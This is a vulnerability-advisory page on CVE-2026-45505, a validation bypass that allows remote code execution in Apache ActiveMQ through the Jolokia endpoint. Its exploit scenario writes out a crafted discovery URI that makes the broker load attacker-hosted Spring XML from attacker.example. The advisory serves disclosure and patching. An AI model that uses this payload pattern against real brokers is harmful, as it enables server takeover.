Skip to main content

Apache ActiveMQ EUVDEUVD-2026-33576

| CVE-2026-45505 HIGH
Improper Input Validation (CWE-20)
2026-06-01 security@apache.org GHSA-v853-w46p-fv2h
8.8
CVSS 3.1 · NVD
Share

Severity by source

NVD PRIMARY
8.8 HIGH
AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

5
CVE Published
Jun 22, 2026 - 06:03 cve.org
HIGH 8.8
Analysis Generated
Jun 01, 2026 - 15:23 vuln.today
CVSS changed
Jun 01, 2026 - 15:22 NVD
8.8 (HIGH)
Patch available
Jun 01, 2026 - 10:01 EUVD
CVE Published
Jun 01, 2026 - 09:16 nvd
UNKNOWN (no severity yet)

DescriptionCVE.org

Improper Input Validation, Improper Control of Generation of Code ('Code Injection') vulnerability in Apache ActiveMQ Broker, Apache ActiveMQ All, Apache ActiveMQ.

Non-parenthesized discovery wrappers such as masterslave:vm://...,... and static:vm://... incorrectly pass validation allowing bypass of fix in CVE-2026-34197.

Original description from CVE-2026-34197.

Apache ActiveMQ exposes the Jolokia JMX-HTTP bridge at /api/jolokia/ on the web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans (org.apache.activemq:*), including BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String). An authenticated attacker can invoke these operations with a crafted discovery UR that triggers the VM transport's brokerConfig parameter to load a remote Spring XML application context using ResourceXmlApplicationContext. Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec(). This issue affects Apache ActiveMQ Broker: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ All: before 5.19.7, from 6.0.0 before 6.2.6; Apache ActiveMQ: before 5.19.7, from 6.0.0 before 6.2.6.

Users are recommended to upgrade to version 5.19.7 or 6.2.6, which fixes the issue.

AnalysisAI

Remote code execution in Apache ActiveMQ Broker, ActiveMQ All, and ActiveMQ (versions before 5.19.7 and 6.0.0 before 6.2.6) allows authenticated attackers to bypass the CVE-2026-34197 fix using non-parenthesized discovery wrappers such as masterslave:vm://... and static:vm://..., which incorrectly pass validation and trigger the VM transport's brokerConfig parameter to load a remote Spring XML application context. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Obtain ActiveMQ console credentials
Delivery
Reach /api/jolokia/ JMX-HTTP bridge
Exploit
Invoke addNetworkConnector with masterslave:vm:// or static:vm:// wrapper
Install
Bypass CVE-2026-34197 validation
C2
Broker fetches attacker-hosted Spring XML
Execute
ResourceXmlApplicationContext instantiates malicious bean
Impact
Execute arbitrary code as broker JVM user

Vulnerability AssessmentAI

Exploitation Attacker must have valid authentication credentials to the ActiveMQ web console / Jolokia endpoint (CVSS PR:L), and the Jolokia JMX-HTTP bridge at /api/jolokia/ must be reachable from the attacker - this is enabled by default on the ActiveMQ web console. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Signals are mixed. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker with valid (or default/weak) ActiveMQ console credentials sends an authenticated HTTP POST to /api/jolokia/ invoking BrokerService.addNetworkConnector with a crafted URI such as `masterslave:vm://broker?brokerConfig=xbean:http://attacker.example/evil.xml`. The wrapper bypasses the CVE-2026-34197 input validation, the VM transport resolves the brokerConfig parameter, and Spring's ResourceXmlApplicationContext fetches and instantiates the attacker's XML, executing arbitrary commands via a Runtime.exec bean factory method as the broker's JVM user. …
Remediation Vendor-released patch: upgrade to Apache ActiveMQ 5.19.7 (for the 5.x line) or 6.2.6 (for the 6.x line) per the Apache announcement at https://lists.apache.org/thread/7n97nddyw96w6ykldjv1h40jx86xdo0w. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

More in Java

View all
CVE-2012-4681 CRITICAL POC
9.8 Aug 28

Oracle Java SE 7 Update 6 and earlier contains multiple sandbox bypass vulnerabilities via the ClassFinder and forName m

CVE-2015-7450 CRITICAL POC
9.8 Jan 02

Remote code execution in IBM Sterling B2B Integrator, Sterling Integrator, and Tivoli Common Reporting allows unauthenti

CVE-2013-2465 CRITICAL POC
9.8 Jun 18

Java Runtime Environment sandbox bypass via incorrect image channel verification in 2D component allows remote unauthent

CVE-2011-3544 CRITICAL POC
9.8 Oct 19

Oracle Java SE JDK/JRE 7 and 6 Update 27 and earlier allows remote code execution with complete system compromise throug

CVE-2010-1871 HIGH POC
8.8 Aug 05

JBoss Seam 2 in Red Hat JBoss EAP 4.3.0 fails to sanitize JBoss Expression Language inputs, allowing remote attackers to

CVE-2017-3066 CRITICAL POC
9.8 Apr 27

Remote unauthenticated attackers can execute arbitrary code on Adobe ColdFusion servers through Java deserialization fla

CVE-2013-2460 CRITICAL POC
9.3 Jun 18

Java Runtime Environment 7 Update 21 and earlier allows remote attackers to escape the Java sandbox and execute arbitrar

CVE-2024-0195 MEDIUM POC
6.3 Jan 02

A vulnerability, which was classified as critical, was found in spider-flow 0.4.3. Rated medium severity (CVSS 6.3), thi

CVE-2026-20131 CRITICAL POC
10.0 Mar 04

Cisco Secure Firewall Management Center (FMC) contains a critical unauthenticated Java deserialization vulnerability (CV

CVE-2026-34197 HIGH POC
8.8 Apr 07

Remote code execution in Apache ActiveMQ Classic versions before 5.19.5 and 6.0.0-6.2.2 allows authenticated attackers t

CVE-2010-5326 CRITICAL POC
10.0 May 13

Remote unauthenticated code execution in SAP NetWeaver Application Server Java (pre-7.3) through the Invoker Servlet all

CVE-2021-44832 MEDIUM
6.6 Dec 28

Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a r

Share

EUVD-2026-33576 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy